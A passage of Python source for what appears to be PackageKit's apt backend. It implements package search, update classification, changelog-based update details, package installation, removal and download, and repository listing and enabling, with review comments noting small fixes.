        # Skip packages already reported by the apt-file pass above
        if pkg.name in result_names:
            continue
        for installed_file in pkg.installed_files:
            if files_pattern.match(installed_file):
                self._emit_visible_package(filters, pkg)
                break
@catch_pkerror
def search_group(self, filters, groups):
    """Emit every visible package whose PackageKit group is one of the
    requested groups.
    """
    pklog.info("Searching for groups: %s" % groups)
    self.status(enums.STATUS_QUERY)
    self.percentage(None)
    self._check_init(progress=False)
    self.allow_cancel(True)
    matching = (candidate for candidate in self._cache
                if self._get_package_group(candidate) in groups)
    for candidate in matching:
        self._emit_visible_package(filters, candidate)
@catch_pkerror
def search_name(self, filters, values):
    """Emit all package versions whose name contains every search term."""
    def contains_all(terms, text):
        """Return True if each of the given terms occurs in text."""
        return all(term in text for term in terms)
    pklog.info("Searching for package name: %s" % values)
    self.status(enums.STATUS_QUERY)
    self.percentage(None)
    self._check_init(progress=False)
    self.allow_cancel(True)
    for pkg_name in self._cache.keys():
        if contains_all(values, pkg_name):
            self._emit_all_visible_pkg_versions(filters,
                                                self._cache[pkg_name])
@catch_pkerror
def search_details(self, filters, values):
    """Search packages by details (name plus description text).

    Uses the Xapian index when available, otherwise falls back to a
    linear scan over the apt cache.
    """
    pklog.info("Searching for package details: %s" % values)
    self.status(enums.STATUS_QUERY)
    self.percentage(None)
    self._check_init(progress=False)
    self.allow_cancel(True)
    if XAPIAN_SUPPORT == True:
        search_flags = (xapian.QueryParser.FLAG_BOOLEAN |
                        xapian.QueryParser.FLAG_PHRASE |
                        xapian.QueryParser.FLAG_LOVEHATE |
                        xapian.QueryParser.FLAG_BOOLEAN_ANY_CASE)
        pklog.debug("Performing xapian db based search")
        db = xapian.Database(XAPIAN_DB)
        parser = xapian.QueryParser()
        parser.set_default_op(xapian.Query.OP_AND)
        query = parser.parse_query(" ".join(values), search_flags)
        enquire = xapian.Enquire(db)
        enquire.set_query(query)
        # BUGFIX: the match set used to be retrieved twice -- once into an
        # unused variable and once in the generator -- running the query
        # two times.  Retrieve it only once.
        for pkg_name in (match.document.get_data()
                         for match in enquire.get_mset(0, 1000)):
            if pkg_name in self._cache:
                self._emit_visible_package(filters, self._cache[pkg_name])
    else:
        def matches(searches, text):
            """Return True if every search term occurs in text."""
            for search in searches:
                if not search in text:
                    return False
            return True
        pklog.debug("Performing apt cache based search")
        values = [val.lower() for val in values]
        for pkg in self._cache:
            txt = pkg.name
            try:
                txt += pkg.candidate.raw_description.lower()
                txt += pkg.candidate._translated_records.long_desc.lower()
            except AttributeError:
                # no candidate or no description records available
                pass
            if matches(values, txt):
                self._emit_visible_package(filters, pkg)
@catch_pkerror
def get_distro_upgrades(self):
    """
    Implement the {backend}-get-distro-upgrades functionality

    Emits a distro_upgrade signal when a newer distribution release is
    available.  Requires update-manager-core (MetaReleaseCore).
    """
    pklog.info("Get distro upgrades")
    self.status(enums.STATUS_INFO)
    self.allow_cancel(False)
    self.percentage(None)
    if META_RELEASE_SUPPORT == False:
        if "update-manager-core" in self._cache and \
           self._cache["update-manager-core"].is_installed == False:
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          "Please install the package update-manager-core "
                          "to get notified of the latest distribution "
                          "releases.")
        else:
            # BUGFIX: the adjacent string literals were missing a
            # separating space ("...core is" + "correctly" rendered as
            # "iscorrectly").
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          "Please make sure that update-manager-core is "
                          "correctly installed.")
    #FIXME Evil to start the download during init
    meta_release = MetaReleaseCore(False, False)
    #FIXME: should use a lock
    while meta_release.downloading:
        time.sleep(1)
    #FIXME: Add support for description
    if meta_release.new_dist is not None:
        self.distro_upgrade("stable",
                            "%s %s" % (meta_release.new_dist.name,
                                       meta_release.new_dist.version),
                            "The latest stable release")
@catch_pkerror
def get_updates(self, filters):
    """Emit all available package updates, classified as security,
    enhancement, bugfix or normal updates.
    """
    def succeeds_security_update(pkg):
        """
        Return True if an update succeeds a previous security update

        An example would be a package with version 1.1 in the security
        archive and 1.1.1 in the archive of proposed updates or the
        same version in both archives.
        """
        for version in pkg.versions:
            # Only check versions between the installed and the candidate
            if (pkg.installed and
                apt_pkg.version_compare(version.version,
                                        pkg.installed.version) <= 0 and
                apt_pkg.version_compare(version.version,
                                        pkg.candidate.version) > 0):
                continue
            for origin in version.origins:
                if origin.origin in ["Debian", "Ubuntu"] and \
                   (origin.archive.endswith("-security") or
                    origin.label == "Debian-Security") and \
                   origin.trusted:
                    return True
        return False
    #FIXME: Implment the basename filter
    pklog.info("Get updates")
    self.status(enums.STATUS_QUERY)
    self.allow_cancel(True)
    self.percentage(None)
    self._check_init(progress=False)
    # Start with a safe upgrade
    self._cache.upgrade(dist_upgrade=True)
    # Search for upgrades which are not already part of the safe upgrade
    # but would only require the installation of additional packages
    for pkg in self._cache:
        if not pkg.is_upgradable:
            continue
        # This may occur on pinned packages which have been updated to
        # later version than the pinned one
        if not pkg.candidate.origins:
            continue
        if not pkg.marked_upgrade:
            #FIXME: Would be nice to have a reason here why
            self._emit_package(pkg, enums.INFO_BLOCKED,
                               force_candidate=True)
            # BUGFIX: skip to the next package; previously control fell
            # through and a blocked update was emitted a second time
            # with a normal info value.
            continue
        # The update can be safely installed
        info = enums.INFO_NORMAL
        # Detect the nature of the upgrade (e.g. security, enhancement)
        candidate_origin = pkg.candidate.origins[0]
        archive = candidate_origin.archive
        origin = candidate_origin.origin
        trusted = candidate_origin.trusted
        label = candidate_origin.label
        if origin in ["Debian", "Ubuntu"] and trusted == True:
            if archive.endswith("-security") or label == "Debian-Security":
                info = enums.INFO_SECURITY
            elif succeeds_security_update(pkg):
                pklog.debug("Update of %s succeeds a security update. "
                            "Raising its priority." % pkg.name)
                info = enums.INFO_SECURITY
            elif archive.endswith("-backports"):
                info = enums.INFO_ENHANCEMENT
            elif archive.endswith("-updates"):
                info = enums.INFO_BUGFIX
        if origin in ["Backports.org archive"] and trusted == True:
            info = enums.INFO_ENHANCEMENT
        self._emit_package(pkg, info, force_candidate=True)
    # Drop the simulated upgrade markings again
    self._cache.clear()
@catch_pkerror
def get_update_detail(self, pkg_ids):
    """Emit detailed update information for the given packages:
    changelog, closed bug URLs, CVE URLs and restart requirement.
    """
    def get_bug_urls(changelog):
        """Return a list of urls pointing to closed bugs in the
        changelog.
        """
        urls = []
        for r in re.findall(MATCH_BUG_CLOSES_DEBIAN, changelog,
                            re.IGNORECASE | re.MULTILINE):
            urls.extend([HREF_BUG_DEBIAN % bug for bug in
                         re.findall(MATCH_BUG_NUMBERS, r)])
        for r in re.findall(MATCH_BUG_CLOSES_UBUNTU, changelog,
                            re.IGNORECASE | re.MULTILINE):
            urls.extend([HREF_BUG_UBUNTU % bug for bug in
                         re.findall(MATCH_BUG_NUMBERS, r)])
        return urls

    def get_cve_urls(changelog):
        """Return a list of urls pointing to CVEs reports referred to in
        the changelog.
        """
        return [HREF_CVE % c for c in re.findall(MATCH_CVE, changelog,
                                                 re.MULTILINE)]

    pklog.info("Get update details of %s" % pkg_ids)
    self.status(enums.STATUS_DOWNLOAD_CHANGELOG)
    self.percentage(0)
    self.allow_cancel(True)
    self._check_init(progress=False)
    total = len(pkg_ids)
    for count, pkg_id in enumerate(pkg_ids):
        self.percentage(count * 100 / total)
        pkg = self._get_package_by_id(pkg_id)
        # FIXME add some real data
        if pkg.installed.origins:
            installed_origin = pkg.installed.origins[0].label
        else:
            installed_origin = ""
        updates = "%s;%s;%s;%s" % (pkg.name, pkg.installed.version,
                                   pkg.installed.architecture,
                                   installed_origin)
        obsoletes = ""
        vendor_url = ""
        restart = "none"
        update_text = ""
        state = ""
        issued = ""
        updated = ""
        #FIXME: make this more configurable. E.g. a dbus update requires
        #       a reboot on Ubuntu but not on Debian
        if pkg.name.startswith("linux-image-") or \
           pkg.name in ["libc6"]:
            # BUGFIX: this was a comparison (==) whose result was
            # discarded, so a required system restart was never reported.
            restart = enums.RESTART_SYSTEM
        #FIXME: Should be part of python-apt
        changelog_dir = apt_pkg.config.find_dir("Dir::Cache::Changelogs")
        if changelog_dir == "/":
            changelog_dir = os.path.join(apt_pkg.config.find_dir("Dir::"
                                                                 "Cache"),
                                         "Changelogs")
        filename = os.path.join(changelog_dir,
                                "%s_%s.gz" % (pkg.name,
                                              pkg.candidate.version))
        changelog_raw = ""
        if os.path.exists(filename):
            pklog.debug("Reading changelog from cache")
            changelog_file = gzip.open(filename, "rb")
            try:
                changelog_raw = changelog_file.read().decode("UTF-8")
            finally:
                changelog_file.close()
        if not changelog_raw:
            pklog.debug("Downloading changelog")
            changelog_raw = pkg.get_changelog()
            # The internal download error string of python-apt ist not
            # provided as unicode object
            if not isinstance(changelog_raw, unicode):
                changelog_raw = changelog_raw.decode("UTF-8")
            else:
                # Write the changelog to the cache
                if not os.path.exists(changelog_dir):
                    os.makedirs(changelog_dir)
                # Remove obsolete cached changelogs
                pattern = os.path.join(changelog_dir, "%s_*.gz" % pkg.name)
                for old_changelog in glob.glob(pattern):
                    os.remove(os.path.join(changelog_dir, old_changelog))
                with gzip.open(filename, mode="wb") as changelog_file:
                    changelog_file.write(changelog_raw.encode("UTF-8"))
        # Convert the changelog to markdown syntax
        changelog = ""
        for line in changelog_raw.split("\n"):
            if line == "":
                changelog += " \n"
            else:
                changelog += "    %s  \n" % line
                if line.startswith(pkg.candidate.source_name):
                    match = re.match(r"(?P<source>.+) \((?P<version>.*)\) "
                                     "(?P<dist>.+); urgency=(?P<urgency>.+)",
                                     line)
                    update_text += "%s\n%s\n\n" % (match.group("version"),
                                                   "=" * \
                                                   len(match.group("version")))
                elif line.startswith("  "):
                    update_text += "  %s  \n" % line
                elif line.startswith(" --"):
                    #FIXME: Add %z for the time zone - requires Python 2.6
                    update_text += "  \n"
                    match = re.match("^ -- (?P<maintainer>.+) (?P<mail><.+>) "
                                     "(?P<date>.+) (?P<offset>[-\+][0-9]+)$",
                                     line)
                    date = datetime.datetime.strptime(match.group("date"),
                                                      "%a, %d %b %Y %H:%M:%S")
                    # issued follows the oldest entry seen so far; updated
                    # keeps the first (newest) entry's date
                    issued = date.isoformat()
                    if not updated:
                        updated = date.isoformat()
        if issued == updated:
            updated = ""
        bugzilla_url = ";;".join(get_bug_urls(changelog))
        cve_url = ";;".join(get_cve_urls(changelog))
        self.update_detail(pkg_id, updates, obsoletes, vendor_url,
                           bugzilla_url, cve_url, restart,
                           format_string(update_text),
                           format_string(changelog),
                           state, issued, updated)
@catch_pkerror
def get_details(self, pkg_ids):
    """Emit details (license, group, description, homepage, size) about
    the given package versions.
    """
    pklog.info("Get details of %s" % pkg_ids)
    self.status(enums.STATUS_INFO)
    self.percentage(None)
    self.allow_cancel(True)
    self._check_init(progress=False)
    total = len(pkg_ids)
    for count, pkg_id in enumerate(pkg_ids):
        self.percentage(count * 100 / total)
        version = self._get_version_by_id(pkg_id)
        #FIXME: We need more fine grained license information!
        if (version.origins and
                version.origins[0].component in ["main", "universe"] and
                version.origins[0].origin in ["Debian", "Ubuntu"]):
            license = "free"
        else:
            license = "unknown"
        # BUGFIX: 'pkg' was undefined here (NameError on every call);
        # derive the package from the resolved version instead.
        group = self._get_package_group(version.package)
        self.details(pkg_id, license, group,
                     format_string(version.description),
                     version.homepage, version.size)
@catch_pkerror
@lock_cache
def update_system(self, only_trusted):
    """Upgrade the system.

    Runs a safe (non-dist) upgrade and commits it; only_trusted makes
    the commit fail on unauthenticated packages.
    """
    pklog.info("Upgrading system")
    self.status(enums.STATUS_UPDATE)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init()
    self._cache.upgrade()
    #FIXME: Emit message about skipped updates
    # for pkg in self._cache:
    #     if pkg.is_upgradable and pkg.marked_upgrade:
    #         continue
    self._check_trusted(only_trusted)
    self._commit_changes()
@catch_pkerror
@lock_cache
def repair_system(self, only_trusted):
    """Recover from broken dependencies by letting apt fix the broken
    state and committing the resulting changes.
    """
    pklog.info("Repairing system")
    self.status(enums.STATUS_DEP_RESOLVE)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init(fail_broken=False)
    try:
        self._cache._depcache.fix_broken()
    except SystemError:
        broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
        # BUGFIX: the adjacent literals were missing a separating space
        # ("block" + "the removal" rendered as "blockthe removal").
        raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                      "The following packages would break and so block "
                      "the removal: %s" % " ".join(broken))
    self._check_trusted(only_trusted)
    self._commit_changes()
@catch_pkerror
def simulate_repair_system(self):
    """Simulate recovery from broken dependencies and emit the changes
    that a repair would perform.
    """
    pklog.info("Simulating system repair")
    self.status(enums.STATUS_DEP_RESOLVE)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init(fail_broken=False)
    try:
        self._cache._depcache.fix_broken()
    except SystemError:
        broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
        # BUGFIX: the adjacent literals were missing a separating space
        # ("block" + "the removal" rendered as "blockthe removal").
        raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                      "The following packages would break and so block "
                      "the removal: %s" % " ".join(broken))
    self._emit_changes()
@catch_pkerror
@lock_cache
def remove_packages(self, allow_deps, auto_remove, ids):
    """Remove packages.

    allow_deps: permit removal of additional dependent packages.
    auto_remove: also remove dependencies that become obsolete.
    Raises PKError if extra removals would be needed but allow_deps is
    False, or if a package is still installed afterwards.
    """
    pklog.info("Removing package(s): id %s" % ids)
    self.status(enums.STATUS_REMOVE)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init()
    if auto_remove:
        # NOTE(review): this snapshot of auto-removable packages is never
        # read afterwards -- possibly a remnant of lost code; confirm
        # against upstream before deleting.
        auto_removables = [pkg.name for pkg in self._cache
                           if pkg.is_auto_removable]
    pkgs = self._mark_for_removal(ids)
    # Check if the removal would remove further packages
    if not allow_deps and self._cache.delete_count != len(ids):
        dependencies = [pkg.name for pkg in self._cache.get_changes()
                        if pkg.name not in pkgs]
        raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                      "The following packages would have also to be "
                      "removed: %s" % " ".join(dependencies))
    if auto_remove:
        self._check_obsoleted_dependencies()
    #FIXME: Should support only_trusted
    self._commit_changes(install_start=10, install_end=90)
    # Re-open the cache and verify everything is really gone
    self._open_cache(start=90, end=99)
    for pkg_name in pkgs:
        if pkg_name in self._cache and self._cache[pkg_name].is_installed:
            raise PKError(enums.ERROR_PACKAGE_FAILED_TO_INSTALL,
                          "%s is still installed" % pkg_name)
    self.percentage(100)
def _check_obsoleted_dependencies(self):
    """Check for no longer required dependencies which should be removed
    too.

    Collects the installed dependencies of everything marked for
    deletion and additionally marks those that are auto-removable.
    """
    installed_deps = set()
    # Batch the markings inside one actiongroup to avoid recomputing the
    # problem state per package
    with self._cache.actiongroup():
        for pkg in self._cache:
            if pkg.marked_delete:
                installed_deps = self._installed_dependencies(pkg.name,
                                                              installed_deps)
        for dep_name in installed_deps:
            if dep_name in self._cache:
                pkg = self._cache[dep_name]
                if pkg.is_installed and pkg.is_auto_removable:
                    pkg.mark_delete(False)
def _installed_dependencies(self, pkg_name, all_deps=None):
    """Recursively return the names of all installed dependencies
    (PreDepends, Depends, Recommends) of the given package.
    """
    #FIXME: Should be part of python-apt
    #       apt.packagek.Version.get_dependencies(recursive=True)
    if not all_deps:
        all_deps = set()
    if pkg_name not in self._cache:
        return all_deps
    current_ver = self._cache[pkg_name]._pkg.current_ver
    if not current_ver:
        # package known but not installed
        return all_deps
    for section in ("PreDepends", "Depends", "Recommends"):
        try:
            section_deps = current_ver.depends_list[section]
        except KeyError:
            continue
        for dep in section_deps:
            dep_name = dep[0].target_pkg.name
            if dep_name not in all_deps:
                all_deps.add(dep_name)
                all_deps |= self._installed_dependencies(dep_name,
                                                         all_deps)
    return all_deps
@catch_pkerror
def simulate_remove_packages(self, ids):
    """Emit the changes that removing the given packages would cause."""
    pklog.info("Simulating removal of package with id %s" % ids)
    self.status(enums.STATUS_DEP_RESOLVE)
    self.allow_cancel(True)
    self.percentage(None)
    self._check_init(progress=False)
    self._emit_changes(self._mark_for_removal(ids))
def _mark_for_removal(self, ids):
    """Resolve the given package ids and mark the packages for removal.

    Returns the list of marked package names.  Raises PKError if a
    package is not installed, the requested version differs from the
    installed one, the package is essential, or dependency resolution
    fails.
    """
    pkgs = []
    with self._cache.actiongroup():
        resolver = apt.cache.ProblemResolver(self._cache)
        for id in ids:
            version = self._get_version_by_id(id)
            pkg = version.package
            if not pkg.is_installed:
                raise PKError(enums.ERROR_PACKAGE_NOT_INSTALLED,
                              "Package %s isn't installed" % pkg.name)
            if pkg.installed != version:
                raise PKError(enums.ERROR_PACKAGE_NOT_INSTALLED,
                              "Version %s of %s isn't installed" %
                              (version.version, pkg.name))
            if pkg.essential:
                raise PKError(enums.ERROR_CANNOT_REMOVE_SYSTEM_PACKAGE,
                              "Package %s cannot be removed." % pkg.name)
            pkgs.append(pkg.name[:])
            pkg.mark_delete(False, False)
            resolver.clear(pkg)
            resolver.protect(pkg)
            resolver.remove(pkg)
        try:
            resolver.resolve()
        except SystemError:
            broken = [pkg.name for pkg in self._cache
                      if pkg.is_inst_broken]
            # BUGFIX: the adjacent literals were missing a separating
            # space ("block" + "the removal" -> "blockthe removal").
            raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                          "The following packages would break and so "
                          "block the removal: %s" % " ".join(broken))
    return pkgs
@catch_pkerror
def get_repo_list(self, filters):
    """
    Implement the {backend}-get-repo-list functionality

    FIXME: should we use the abstration of software-properties or provide
    low level access using pure aptsources?
    """
    pklog.info("Getting repository list: %s" % filters)
    self.status(enums.STATUS_INFO)
    self.allow_cancel(False)
    self.percentage(0)
    if REPOS_SUPPORT == False:
        if ("python-software-properties" in self._cache and
                not self._cache["python-software-properties"].is_installed):
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          "Please install the package "
                          "python-software-properties to handle "
                          "repositories")
        else:
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          "Please make sure that python-software-properties" " is correctly installed.")
    repos = PackageKitSoftwareProperties()
    # Emit distro components as virtual repositories
    for comp in repos.distro.source_template.components:
        repo_id = "%s_comp_%s" % (repos.distro.id, comp.name)
        description = "%s %s - %s (%s)" % (repos.distro.id,
                                           repos.distro.release,
                                           comp.get_description().decode("UTF-8"),
                                           comp.name)
        #FIXME: There is no inconsitent state in PackageKit
        enabled = repos.get_comp_download_state(comp)[0]
        if not enums.FILTER_DEVELOPMENT in filters:
            self.repo_detail(repo_id,
                             format_string(description),
                             enabled)
    # Emit distro's virtual update repositories
    for template in repos.distro.source_template.children:
        repo_id = "%s_child_%s" % (repos.distro.id, template.name)
        description = "%s %s - %s (%s)" % (repos.distro.id,
                                           repos.distro.release,
                                           template.description.decode("UTF-8"),
                                           template.name)
        #FIXME: There is no inconsitent state in PackageKit
        enabled = repos.get_comp_child_state(template)[0]
        if not enums.FILTER_DEVELOPMENT in filters:
            self.repo_detail(repo_id,
                             format_string(description),
                             enabled)
    # Emit distro's cdrom sources
    for source in repos.get_cdrom_sources():
        if enums.FILTER_NOT_DEVELOPMENT in filters and \
           source.type in ("deb-src", "rpm-src"):
            continue
        enabled = not source.disabled
        # Remove markups from the description
        description = re.sub(r"</?b>", "", repos.render_source(source))
        repo_id = "cdrom_%s_%s" % (source.uri, source.dist)
        # NOTE(review): str.join returns a new string which is discarded
        # here, so the component suffix never becomes part of repo_id.
        # repo_enable builds its ids the same (broken) way, so matching
        # still works -- fixing one side alone would break the other.
        repo_id.join(["_%s" % c for c in source.comps])
        self.repo_detail(repo_id, format_string(description), enabled)
    # Emit distro's virtual source code repositoriy
    if not enums.FILTER_NOT_DEVELOPMENT in filters:
        repo_id = "%s_source" % repos.distro.id
        enabled = repos.get_source_code_state() or False
        #FIXME: no translation :(
        description = "%s %s - Source code" % (repos.distro.id,
                                               repos.distro.release)
        self.repo_detail(repo_id, format_string(description), enabled)
    # Emit third party repositories
    for source in repos.get_isv_sources():
        if enums.FILTER_NOT_DEVELOPMENT in filters and \
           source.type in ("deb-src", "rpm-src"):
            continue
        enabled = not source.disabled
        # Remove markups from the description
        description = re.sub(r"</?b>", "", repos.render_source(source))
        repo_id = "isv_%s_%s" % (source.uri, source.dist)
        # NOTE(review): result discarded, see cdrom loop above
        repo_id.join(["_%s" % c for c in source.comps])
        self.repo_detail(repo_id,
                         format_string(description.decode("UTF-8")),
                         enabled)
@catch_pkerror
def repo_enable(self, repo_id, enable):
    """
    Implement the {backend}-repo-enable functionality

    FIXME: should we use the abstration of software-properties or provide
    low level access using pure aptsources?
    """
    pklog.info("Enabling repository: %s %s" % (repo_id, enable))
    self.status(enums.STATUS_RUNNING)
    self.allow_cancel(False)
    self.percentage(0)
    if REPOS_SUPPORT == False:
        if ("python-software-properties" in self._cache and
                not self._cache["python-software-properties"].is_installed):
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          "Please install the package "
                          "python-software-properties to handle "
                          "repositories")
        else:
            # BUGFIX: adjacent literals were missing a separating space
            # ("...properties" + "is correctly installed").
            raise PKError(enums.ERROR_INTERNAL_ERROR,
                          "Please make sure that python-software-properties "
                          "is correctly installed.")
    repos = PackageKitSoftwareProperties()
    found = False
    # Check if the repo_id matches a distro component, e.g. main
    if repo_id.startswith("%s_comp_" % repos.distro.id):
        for comp in repos.distro.source_template.components:
            if repo_id == "%s_comp_%s" % (repos.distro.id, comp.name):
                if enable == repos.get_comp_download_state(comp)[0]:
                    pklog.debug("Repository is already enabled")
                # BUGFIX: this was a second independent 'if', so the
                # component was toggled even when already in the wanted
                # state; the child-repository branch below uses elif.
                elif enable == True:
                    repos.enable_component(comp.name)
                else:
                    repos.disable_component(comp.name)
                found = True
                break
    # Check if the repo_id matches a distro child repository, e.g.
    # hardy-updates
    elif repo_id.startswith("%s_child_" % repos.distro.id):
        for template in repos.distro.source_template.children:
            if repo_id == "%s_child_%s" % (repos.distro.id, template.name):
                if enable == repos.get_comp_child_state(template)[0]:
                    pklog.debug("Repository is already enabled")
                elif enable == True:
                    repos.enable_child_source(template)
                else:
                    repos.disable_child_source(template)
                found = True
                break
    # Check if the repo_id matches a cdrom repository
    elif repo_id.startswith("cdrom_"):
        # NOTE(review): this iterates get_isv_sources() although
        # get_repo_list emits cdrom ids from get_cdrom_sources() --
        # looks wrong, but left untouched; confirm against upstream.
        for source in repos.get_isv_sources():
            source_id = "cdrom_%s_%s" % (source.uri, source.dist)
            # NOTE(review): str.join result discarded -- matches the id
            # construction in get_repo_list, so matching still works.
            source_id.join(["_%s" % c for c in source.comps])
            if repo_id == source_id:
                if source.disabled == enable:
                    source.disabled = not enable
                    repos.save_sourceslist()
                else:
                    pklog.debug("Repository is already enabled")
                found = True
                break
    # Check if the repo_id matches an isv repository
    elif repo_id.startswith("isv_"):
        for source in repos.get_isv_sources():
            source_id = "isv_%s_%s" % (source.uri, source.dist)
            source_id.join(["_%s" % c for c in source.comps])
            if repo_id == source_id:
                if source.disabled == enable:
                    source.disabled = not enable
                    repos.save_sourceslist()
                else:
                    pklog.debug("Repository is already enabled")
                found = True
                break
    if found == False:
        raise PKError(enums.ERROR_REPO_NOT_AVAILABLE,
                      "The repository %s isn't available" % repo_id)
@catch_pkerror
@lock_cache
def update_packages(self, only_trusted, ids):
    """Update the given packages to their requested versions.

    Commits the upgrade, re-opens the cache and raises PKError for any
    package that is still missing, not installed or still upgradable.
    """
    pklog.info("Updating package with id %s" % ids)
    self.status(enums.STATUS_UPDATE)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init()
    pkgs = self._mark_for_upgrade(ids)
    self._check_trusted(only_trusted)
    self._commit_changes()
    self._open_cache(start=90, end=100)
    self.percentage(100)
    pklog.debug("Checking success of operation")
    for pkg_name in pkgs:
        if (pkg_name not in self._cache or
                not self._cache[pkg_name].is_installed or
                self._cache[pkg_name].is_upgradable):
            raise PKError(enums.ERROR_PACKAGE_FAILED_TO_INSTALL,
                          "%s was not updated" % pkg_name)
    pklog.debug("Sending success signal")
@catch_pkerror
def simulate_update_packages(self, ids):
    """Emit the changes that upgrading the given packages would cause."""
    pklog.info("Simulating update of package with id %s" % ids)
    self.status(enums.STATUS_DEP_RESOLVE)
    self.allow_cancel(True)
    self.percentage(None)
    self._check_init(progress=False)
    self._emit_changes(self._mark_for_upgrade(ids))
def _mark_for_upgrade(self, ids):
    """Resolve the given package ids and mark the packages for upgrade.

    Returns the list of marked package names.  Raises PKError if a
    package isn't installed, the requested version isn't newer than the
    installed one, or dependency resolution fails.
    """
    pkgs = []
    with self._cache.actiongroup():
        resolver = apt.cache.ProblemResolver(self._cache)
        for id in ids:
            version = self._get_version_by_id(id)
            pkg = version.package
            if not pkg.is_installed:
                raise PKError(enums.ERROR_PACKAGE_NOT_INSTALLED,
                              "%s isn't installed" % pkg.name)
            # Check if the specified version is an update
            if apt_pkg.version_compare(pkg.installed.version,
                                       version.version) >= 0:
                raise PKError(enums.ERROR_UPDATE_NOT_FOUND,
                              "The version %s of %s isn't an update to the "
                              "current %s" % (version.version, pkg.name,
                                              pkg.installed.version))
            pkg.candidate = version
            # copy the name so it survives the cache being re-opened
            pkgs.append(pkg.name[:])
            pkg.mark_install(False, True)
            resolver.clear(pkg)
            resolver.protect(pkg)
        try:
            resolver.resolve()
        except SystemError as error:
            broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
            raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                          "The following packages block the installation: "
                          "%s" % " ".join(broken))
    return pkgs
@catch_pkerror
def download_packages(self, dest, ids):
    """Download packages to the given destination directory.

    Emits a files signal with the downloaded path for each package.
    Raises PKError if dest is not writable, a package version is not
    downloadable or the fetch fails.
    """
    def get_download_details(ids):
        """Calculate the start and end point of a package download
        progress.

        Yields (id, version, start, end) where start/end are integer
        percentages of the total download size (Python 2 integer
        division).
        """
        total = 0
        downloaded = 0
        versions = []
        # Check if all ids are vaild and calculate the total download size
        for id in ids:
            pkg_ver = self._get_pkg_version_by_id(id)
            if not pkg_ver.downloadable:
                raise PKError(enums.ERROR_PACKAGE_DOWNLOAD_FAILED,
                              "package %s isn't downloadable" % id)
            total += pkg_ver.size
            versions.append((id, pkg_ver))
        for id, ver in versions:
            start = downloaded * 100 / total
            end = start + ver.size * 100 / total
            yield id, ver, start, end
            downloaded += ver.size
    pklog.info("Downloading packages: %s" % ids)
    self.status(enums.STATUS_DOWNLOAD)
    self.allow_cancel(True)
    self.percentage(0)
    # Check the destination directory
    if not os.path.isdir(dest) or not os.access(dest, os.W_OK):
        raise PKError(enums.ERROR_INTERNAL_ERROR,
                      "The directory '%s' is not writable" % dest)
    # Setup the fetcher
    self._check_init()
    # Start the download
    for id, ver, start, end in get_download_details(ids):
        progress = PackageKitAcquireProgress(self, start, end)
        self._emit_pkg_version(ver, enums.INFO_DOWNLOADING)
        try:
            ver.fetch_binary(dest, progress)
        except Exception as error:
            raise PKError(enums.ERROR_PACKAGE_DOWNLOAD_FAILED,
                          format_string(str(error)))
        else:
            self.files(id, os.path.join(dest,
                                        os.path.basename(ver.filename)))
            self._emit_pkg_version(ver, enums.INFO_FINISHED)
    self.percentage(100)
@catch_pkerror
@lock_cache
def install_packages(self, only_trusted, ids):
    """Install the given packages.

    Commits the installation, re-opens the cache and raises PKError for
    any package that did not end up installed.
    """
    pklog.info("Installing package with id %s" % ids)
    self.status(enums.STATUS_INSTALL)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init()
    pkgs = self._mark_for_installation(ids)
    self._check_trusted(only_trusted)
    self._commit_changes()
    self._open_cache(start=90, end=100)
    self.percentage(100)
    pklog.debug("Checking success of operation")
    for p in pkgs:
        if p not in self._cache or not self._cache[p].is_installed:
            raise PKError(enums.ERROR_PACKAGE_FAILED_TO_INSTALL,
                          "%s was not installed" % p)
@catch_pkerror
def simulate_install_packages(self, ids):
    """Emit the changes required for the installation of the given
    packages.
    """
    pklog.info("Simulating installing package with id %s" % ids)
    self.status(enums.STATUS_DEP_RESOLVE)
    self.allow_cancel(True)
    self.percentage(None)
    self._check_init(progress=False)
    self._emit_changes(self._mark_for_installation(ids))
def _mark_for_installation(self, ids):
    """Resolve the given package ids and mark the packages for
    installation.

    Returns the list of marked package names.  Raises PKError if a
    package is already installed in the requested version or dependency
    resolution fails.
    """
    pkgs = []
    with self._cache.actiongroup():
        resolver = apt.cache.ProblemResolver(self._cache)
        for id in ids:
            version = self._get_version_by_id(id)
            pkg = version.package
            pkg.candidate = version
            if pkg.installed == version:
                raise PKError(enums.ERROR_PACKAGE_ALREADY_INSTALLED,
                              "Package %s is already installed" % pkg.name)
            # copy the name so it survives the cache being re-opened
            pkgs.append(pkg.name[:])
            pkg.mark_install(False, True, True)
            resolver.clear(pkg)
            resolver.protect(pkg)
        try:
            resolver.resolve()
        except SystemError as error:
            broken = [pkg.name for pkg in self._cache if pkg.is_inst_broken]
            raise PKError(enums.ERROR_DEP_RESOLUTION_FAILED,
                          "The following packages block the installation: "
                          "%s" % " ".join(broken))
    return pkgs
@catch_pkerror
@lock_cache
def install_files(self, only_trusted, inst_files):
    """Install local Debian package files.

    First resolves and commits the repository dependencies of all given
    .deb files, then installs the files themselves via dpkg.
    """
    pklog.info("Installing package files: %s" % inst_files)
    self.status(enums.STATUS_INSTALL)
    self.allow_cancel(False)
    self.percentage(0)
    self._check_init()
    packages = []
    # Collect all dependencies which need to be installed
    self.status(enums.STATUS_DEP_RESOLVE)
    for path in inst_files:
        deb = apt.debfile.DebPackage(path, self._cache)
        packages.append(deb)
        if not deb.check():
            raise PKError(enums.ERROR_LOCAL_INSTALL_FAILED,
                          format_string(deb._failure_string))
        (install, remove, unauthenticated) = deb.required_changes
        pklog.debug("Changes: Install %s, Remove %s, Unauthenticated "
                    "%s" % (install, remove, unauthenticated))
        # Refuse if installing the file would require removals
